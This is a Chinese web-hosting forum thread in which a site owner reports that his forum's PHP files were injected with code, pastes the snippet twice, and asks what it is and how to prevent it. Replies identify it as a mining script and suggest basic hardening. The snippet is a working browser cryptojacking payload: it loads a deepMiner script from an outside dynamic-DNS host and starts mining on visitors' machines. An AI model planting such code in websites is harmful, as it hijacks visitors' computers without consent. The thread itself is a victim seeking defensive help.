全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 7769|回复: 20

论坛被挂马了,附上木马代码,求大神分析

[复制链接]
发表于 2018-1-26 09:49:04 | 显示全部楼层 |阅读模式
本帖最后由 图样图森破 于 2018-1-26 10:11 编辑


今天打开自己的一个论坛,杀毒软件马上报警,

经检查,发现论坛根目录下的PHP文件全部被插入下面这段代码:


echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";



求大神分析,这是啥东东?如何预防再次被挂马?
发表于 2018-1-26 09:51:20 | 显示全部楼层
无法预防,因为你压根都不知道别人从哪里进来的
 楼主| 发表于 2018-1-26 09:53:38 | 显示全部楼层
klon99 发表于 2018-1-26 09:51
无法预防,因为你压根都不知道别人从哪里进来的

对方应该没有拿到管理员权限
发表于 2018-1-26 09:53:44 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
 楼主| 发表于 2018-1-26 09:56:38 | 显示全部楼层
ecosway598 发表于 2018-1-26 09:53
修改  3389 22 21 关闭可关闭的端口  只留80 443

文件 目录权限设置444

谢谢大佬指点,之前从未做过安全设置,没想到没什么流量的网站也会被盯上
发表于 2018-1-26 10:03:48 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
 楼主| 发表于 2018-1-26 10:12:13 | 显示全部楼层
经分析,发现论坛根目录下的PHP文件全部被插入下面这段代码:

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";
发表于 2018-1-26 10:13:24 | 显示全部楼层
还好只是挖矿
发表于 2018-1-26 10:14:08 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
 楼主| 发表于 2018-1-26 10:14:59 | 显示全部楼层

果然是挖矿代码啊?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-24 02:33 , Processed in 0.064550 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表